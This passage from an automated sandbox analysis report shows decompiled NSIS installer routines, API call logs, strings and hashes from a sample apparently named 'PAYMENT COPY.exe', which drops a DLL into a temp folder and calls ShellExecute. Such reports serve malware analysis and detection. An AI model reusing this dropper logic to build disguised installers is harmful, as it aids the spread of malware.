                                                                  						if((_v12 & 0x00000004) != 0) {
                                                                  							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
                                                                  						}
                                                                  						if((_v12 & 0x00000002) != 0) {
                                                                  							_v32 = 0x79ed60;
                                                                  							_v52 = 1;
                                                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                  							_v44 = 0;
                                                                  							_v48 = _t29 - _t39;
                                                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                  						}
                                                                  						if(_t39 != 0) {
                                                                  							_t28 = _a4;
                                                                  							 *((char*)(_t28 + 0x79ed60)) = 0;
                                                                  							return _t28;
                                                                  						}
                                                                  					} else {
                                                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                  						if(_t26 < 0x800) {
                                                                  							_t26 = lstrcatA(0x79ed60, _a8);
                                                                  							goto L6;
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t26;
                                                                  			}

















                                                                  0x00404d68
                                                                  0x00404d74
                                                                  0x00404d77
                                                                  0x00404d7d
                                                                  0x00404d89
                                                                  0x00404d8c
                                                                  0x00404d8f
                                                                  0x00404d95
                                                                  0x00404d95
                                                                  0x00404d9b
                                                                  0x00404da3
                                                                  0x00404da6
                                                                  0x00404dc3
                                                                  0x00404dc7
                                                                  0x00404dd0
                                                                  0x00404dd0
                                                                  0x00404dda
                                                                  0x00404de3
                                                                  0x00404def
                                                                  0x00404df6
                                                                  0x00404dfa
                                                                  0x00404dfd
                                                                  0x00404e10
                                                                  0x00404e1e
                                                                  0x00404e1e
                                                                  0x00404e22
                                                                  0x00404e24
                                                                  0x00404e27
                                                                  0x00000000
                                                                  0x00404e27
                                                                  0x00404da8
                                                                  0x00404db0
                                                                  0x00404db8
                                                                  0x00404dbe
                                                                  0x00000000
                                                                  0x00404dbe
                                                                  0x00404db8
                                                                  0x00404da6
                                                                  0x00404e31

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                  • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                  • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                  • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: `y
                                                                  • API String ID: 2531174081-1740403070
                                                                  • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                  • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                  • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                  • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405BFB(CHAR* _a4) {
                                                                  				char _t5;
                                                                  				char _t7;
                                                                  				char* _t15;
                                                                  				char* _t16;
                                                                  				CHAR* _t17;
                                                                  
                                                                  				_t17 = _a4;
                                                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                  					_t17 =  &(_t17[4]);
                                                                  				}
                                                                  				if( *_t17 != 0 && E00405538(_t17) != 0) {
                                                                  					_t17 =  &(_t17[2]);
                                                                  				}
                                                                  				_t5 =  *_t17;
                                                                  				_t15 = _t17;
                                                                  				_t16 = _t17;
                                                                  				if(_t5 != 0) {
                                                                  					do {
                                                                  						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
                                                                  							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
                                                                  							_t16 = CharNextA(_t16);
                                                                  						}
                                                                  						_t17 = CharNextA(_t17);
                                                                  						_t5 =  *_t17;
                                                                  					} while (_t5 != 0);
                                                                  				}
                                                                  				 *_t16 =  *_t16 & 0x00000000;
                                                                  				while(1) {
                                                                  					_t16 = CharPrevA(_t15, _t16);
                                                                  					_t7 =  *_t16;
                                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                  						break;
                                                                  					}
                                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                                  					if(_t15 < _t16) {
                                                                  						continue;
                                                                  					}
                                                                  					break;
                                                                  				}
                                                                  				return _t7;
                                                                  			}








                                                                  0x00405bfd
                                                                  0x00405c05
                                                                  0x00405c19
                                                                  0x00405c19
                                                                  0x00405c1f
                                                                  0x00405c2c
                                                                  0x00405c2c
                                                                  0x00405c2d
                                                                  0x00405c2f
                                                                  0x00405c33
                                                                  0x00405c35
                                                                  0x00405c3e
                                                                  0x00405c40
                                                                  0x00405c5a
                                                                  0x00405c62
                                                                  0x00405c62
                                                                  0x00405c67
                                                                  0x00405c69
                                                                  0x00405c6b
                                                                  0x00405c6f
                                                                  0x00405c70
                                                                  0x00405c73
                                                                  0x00405c7b
                                                                  0x00405c7d
                                                                  0x00405c81
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405c87
                                                                  0x00405c8c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405c8c
                                                                  0x00405c91

                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                  • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                  • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                  • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                  • *?|<>/":, xrefs: 00405C43
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                  • API String ID: 589700163-3391106468
                                                                  • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                  • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                  • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                  • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                  				struct tagLOGBRUSH _v16;
                                                                  				long _t35;
                                                                  				long _t37;
                                                                  				void* _t40;
                                                                  				long* _t49;
                                                                  
                                                                  				if(_a4 + 0xfffffecd > 5) {
                                                                  					L15:
                                                                  					return 0;
                                                                  				}
                                                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                  				if(_t49 == 0) {
                                                                  					goto L15;
                                                                  				}
                                                                  				_t35 =  *_t49;
                                                                  				if((_t49[5] & 0x00000002) != 0) {
                                                                  					_t35 = GetSysColor(_t35);
                                                                  				}
                                                                  				if((_t49[5] & 0x00000001) != 0) {
                                                                  					SetTextColor(_a8, _t35);
                                                                  				}
                                                                  				SetBkMode(_a8, _t49[4]);
                                                                  				_t37 = _t49[1];
                                                                  				_v16.lbColor = _t37;
                                                                  				if((_t49[5] & 0x00000008) != 0) {
                                                                  					_t37 = GetSysColor(_t37);
                                                                  					_v16.lbColor = _t37;
                                                                  				}
                                                                  				if((_t49[5] & 0x00000004) != 0) {
                                                                  					SetBkColor(_a8, _t37);
                                                                  				}
                                                                  				if((_t49[5] & 0x00000010) != 0) {
                                                                  					_v16.lbStyle = _t49[2];
                                                                  					_t40 = _t49[3];
                                                                  					if(_t40 != 0) {
                                                                  						DeleteObject(_t40);
                                                                  					}
                                                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                                                  				}
                                                                  				return _t49[3];
                                                                  			}








                                                                  0x00403e20
                                                                  0x00403eb4
                                                                  0x00000000
                                                                  0x00403eb4
                                                                  0x00403e31
                                                                  0x00403e35
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403e3b
                                                                  0x00403e44
                                                                  0x00403e47
                                                                  0x00403e47
                                                                  0x00403e4d
                                                                  0x00403e53
                                                                  0x00403e53
                                                                  0x00403e5f
                                                                  0x00403e65
                                                                  0x00403e6c
                                                                  0x00403e6f
                                                                  0x00403e72
                                                                  0x00403e74
                                                                  0x00403e74
                                                                  0x00403e7c
                                                                  0x00403e82
                                                                  0x00403e82
                                                                  0x00403e8c
                                                                  0x00403e91
                                                                  0x00403e94
                                                                  0x00403e99
                                                                  0x00403e9c
                                                                  0x00403e9c
                                                                  0x00403eac
                                                                  0x00403eac
                                                                  0x00000000

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                  • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                  • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                  • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E0040166B() {
                                                                  				int _t18;
                                                                  				void* _t28;
                                                                  				void* _t35;
                                                                  
                                                                  				 *(_t35 + 8) = E00402A9A(0xffffffd0);
                                                                  				 *(_t35 - 8) = E00402A9A(0xffffffdf);
                                                                  				E004059BF(0x40a018,  *(_t35 + 8));
                                                                  				_t18 = lstrlenA( *(_t35 - 8));
                                                                  				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                                                  					lstrcatA(0x40a018, 0x40901c);
                                                                  					lstrcatA(0x40a018,  *(_t35 - 8));
                                                                  				}
                                                                  				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                                                  					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
                                                                  						 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                  					} else {
                                                                  						E00405707( *(_t35 + 8),  *(_t35 - 8));
                                                                  						_push(0xffffffe4);
                                                                  						goto L7;
                                                                  					}
                                                                  				} else {
                                                                  					_push(0xffffffe3);
                                                                  					L7:
                                                                  					E00401428();
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                                                  				return 0;
                                                                  			}






                                                                  0x00401674
                                                                  0x00401684
                                                                  0x00401688
                                                                  0x00401690
                                                                  0x004016a7
                                                                  0x004016af
                                                                  0x004016b8
                                                                  0x004016b8
                                                                  0x004016cb
                                                                  0x004016d7
                                                                  0x004026da
                                                                  0x004016ed
                                                                  0x004016f3
                                                                  0x004016f8
                                                                  0x00000000
                                                                  0x004016f8
                                                                  0x004016cd
                                                                  0x004016cd
                                                                  0x004021e8
                                                                  0x004021e8
                                                                  0x004021e8
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                    • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,?,000000DF,000000D0), ref: 00401690
                                                                  • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,?,000000DF,000000D0), ref: 0040169A
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,?,000000DF,000000D0), ref: 004016AF
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,?,000000DF,000000D0), ref: 004016B8
                                                                    • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ), ref: 00405CA2
                                                                    • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                    • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                    • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                    • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                    • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                    • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                    • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                    • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                    • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                    • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                    • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                    • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                    • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                  • MoveFileA.KERNEL32 ref: 004016C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                  • API String ID: 2621199633-2113665744
                                                                  • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                  • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                  • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                  • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404627(struct HWND__* _a4, intOrPtr _a8) {
                                                                  				long _v8;
                                                                  				signed char _v12;
                                                                  				unsigned int _v16;
                                                                  				void* _v20;
                                                                  				intOrPtr _v24;
                                                                  				long _v56;
                                                                  				void* _v60;
                                                                  				long _t15;
                                                                  				unsigned int _t19;
                                                                  				signed int _t25;
                                                                  				struct HWND__* _t28;
                                                                  
                                                                  				_t28 = _a4;
                                                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                  				if(_a8 == 0) {
                                                                  					L4:
                                                                  					_v56 = _t15;
                                                                  					_v60 = 4;
                                                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                  					return _v24;
                                                                  				}
                                                                  				_t19 = GetMessagePos();
                                                                  				_v16 = _t19 >> 0x10;
                                                                  				_v20 = _t19;
                                                                  				ScreenToClient(_t28,  &_v20);
                                                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                  				if((_v12 & 0x00000066) != 0) {
                                                                  					_t15 = _v8;
                                                                  					goto L4;
                                                                  				}
                                                                  				return _t25 | 0xffffffff;
                                                                  			}














                                                                  0x00404635
                                                                  0x00404642
                                                                  0x00404648
                                                                  0x00404686
                                                                  0x00404686
                                                                  0x00404695
                                                                  0x0040469c
                                                                  0x00000000
                                                                  0x0040469e
                                                                  0x0040464a
                                                                  0x00404659
                                                                  0x00404661
                                                                  0x00404664
                                                                  0x00404676
                                                                  0x0040467c
                                                                  0x00404683
                                                                  0x00000000
                                                                  0x00404683
                                                                  0x00000000

                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                  • GetMessagePos.USER32 ref: 0040464A
                                                                  • ScreenToClient.USER32 ref: 00404664
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                  • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                  • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                  • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                  				int _t7;
                                                                  				int _t15;
                                                                  				struct HWND__* _t16;
                                                                  
                                                                  				_t16 = _a4;
                                                                  				if(_a8 == 0x110) {
                                                                  					SetTimer(_t16, 1, 0xfa, 0);
                                                                  					_a8 = 0x113;
                                                                  					 *0x40b020 = _a16;
                                                                  				}
                                                                  				if(_a8 == 0x113) {
                                                                  					_t15 =  *0x789930; // 0x32765
                                                                  					_t7 =  *0x79d938; // 0x32769
                                                                  					if(_t15 >= _t7) {
                                                                  						_t15 = _t7;
                                                                  					}
                                                                  					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                                                  					SetWindowTextA(_t16, 0x7898f0);
                                                                  					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
                                                                  					ShowWindow(_t16, 5);
                                                                  				}
                                                                  				return 0;
                                                                  			}






                                                                  0x00402bb7
                                                                  0x00402bbf
                                                                  0x00402bcb
                                                                  0x00402bd4
                                                                  0x00402bd7
                                                                  0x00402bd7
                                                                  0x00402bdf
                                                                  0x00402be1
                                                                  0x00402be7
                                                                  0x00402bee
                                                                  0x00402bf0
                                                                  0x00402bf0
                                                                  0x00402c09
                                                                  0x00402c14
                                                                  0x00402c21
                                                                  0x00402c29
                                                                  0x00402c29
                                                                  0x00402c34

                                                                  APIs
                                                                  • SetTimer.USER32 ref: 00402BCB
                                                                  • MulDiv.KERNEL32(00032765,00000064,00032769), ref: 00402BF6
                                                                  • wsprintfA.USER32 ref: 00402C09
                                                                  • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                  • SetDlgItemTextA.USER32 ref: 00402C21
                                                                  • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: TextWindow$ItemShowTimerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 559026099-0
                                                                  • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                  • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                  • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                  • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E00401E34() {
                                                                  				signed int _t7;
                                                                  				void* _t19;
                                                                  				char* _t20;
                                                                  				signed int _t24;
                                                                  				void* _t26;
                                                                  
                                                                  				_t24 = E00402A9A(_t19);
                                                                  				_t20 = E00402A9A(0x31);
                                                                  				_t7 = E00402A9A(0x22);
                                                                  				_push(_t20);
                                                                  				_push(_t24);
                                                                  				_t22 = _t7;
                                                                  				wsprintfA("C:\Users\engineer\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll", "%s %s");
                                                                  				E00401428(0xffffffec);
                                                                  				asm("sbb eax, eax");
                                                                  				asm("sbb eax, eax");
                                                                  				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                                  					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
                                                                  				return 0;
                                                                  			}








                                                                  0x00401e3c
                                                                  0x00401e45
                                                                  0x00401e47
                                                                  0x00401e4c
                                                                  0x00401e4d
                                                                  0x00401e58
                                                                  0x00401e5a
                                                                  0x00401e65
                                                                  0x00401e71
                                                                  0x00401e7f
                                                                  0x00401e91
                                                                  0x004026da
                                                                  0x004026da
                                                                  0x00402932
